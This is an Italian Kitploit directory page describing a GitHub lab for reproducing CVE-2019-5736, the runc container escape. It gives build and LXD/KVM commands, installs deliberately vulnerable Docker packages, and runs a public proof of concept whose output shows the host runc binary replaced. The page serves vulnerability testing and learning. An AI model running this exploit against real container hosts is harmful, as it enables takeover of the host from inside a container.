Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
cve-2019-5736-reproducer — Riproduttore per CVE-2019-5736, una vulnerabilità di fuga dal contenitore RunC. Fornisce script di build e un laboratorio basato su KVM per confermare l'exploit contro pacchetti Docker vulnerabili. | Kitploit
Strumenti/GitHubGitHub/takumak/cve-2019-5736-reproducer
Sicurezza dei ContenitoriAnalisi delle VulnerabilitàExploitSicurezza CloudApprendimento e FormazioneEscape dal Container
GitHubtakumak/cve-2019-5736-reproducer

cve-2019-5736-reproducer

Riproduttore per CVE-2019-5736, una vulnerabilità di fuga dal contenitore RunC. Fornisce script di build e un laboratorio basato su KVM per confermare l'exploit contro pacchetti Docker vulnerabili.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
74 anni faNon ancora revisionato

CVE-2019-5736 riproduttore

Questo ti permette di confermare che RunC-CVE-2019-5736 funziona sulla tua istanza KVM.

Panoramica del flusso di lavoro

  • Compila i pacchetti correlati a docker.io vulnerabili a CVE-2019-5736 in questo repository
  • Avvia un'istanza KVM Ubuntu 18.04 su LXD
  • Installa i pacchetti *.deb vulnerabili nella VM
  • Prova la procedura descritta in RunC-CVE-2019-5736

Compila i pacchetti *.deb vulnerabili

root@kitploit:~
$ docker-compose build --no-cache
$ docker-compose run build

Prepara il tarball dei sorgenti di RunC-CVE-2019-5736

root@kitploit:~
$ git clone https://github.com/twistlock/RunC-CVE-2019-5736.git
$ tar cjf RunC-CVE-2019-5736.tar.bz2 RunC-CVE-2019-5736

Avvia un'istanza KVM Ubuntu 18.04 su LXD

root@kitploit:~
$ lxc launch --vm images:ubuntu/18.04 test-cve-2019-5736 -c limits.cpu=4 -c limits.memory=4GB
$ lxc file push deb/*.deb RunC-CVE-2019-5736.tar.bz2 test-cve-2019-5736/root/
$ lxc exec test-cve-2019-5736 bash
root@test-cve-2019-5736:~# sed -i -e '/bionic-updates/s/^/#/' -e '/bionic-security/s/^/#/' /etc/apt/sources.list
root@test-cve-2019-5736:~# apt update
root@test-cve-2019-5736:~# apt install iptables libltdl7
root@test-cve-2019-5736:~# dpkg -i containerd_0.2.5-0ubuntu2_amd64.deb docker.io_17.12.1-0ubuntu6_amd64.deb runc_1.0.0~rc6+git20181203.96ec2177-0~ubuntu2_amd64.deb

Nota che dovresti usare images:ubuntu/18.04 invece di ubuntu:18.04 perché il comando lxc exec non funziona correttamente con quest'ultima.

Riproduci RunC-CVE-2019-5736

root@kitploit:~
$ lxc exec test-cve-2019-5736 bash
root@test-cve-2019-5736:~# tar xf RunC-CVE-2019-5736.tar.bz2
root@test-cve-2019-5736:~# cd RunC-CVE-2019-5736
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker build -t cve-2019-5736:exec_POC ./exec_POC
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
92b965383f377419f3dad7cec45e468a4c4a83e82e11a2f2e0e23803016e2840
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# docker exec poc_ctr bash
No help topic for '/usr/bin/bash'
root@test-cve-2019-5736:~/RunC-CVE-2019-5736# /usr/bin/docker-runc

**THE ALL NEW AND IMPROVED RUNC**

        [+] Your backdoor here ->

root@test-cve-2019-5736:~/RunC-CVE-2019-5736# 

Appendice

  • Commit di correzione: https://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b
Scarica lo strumento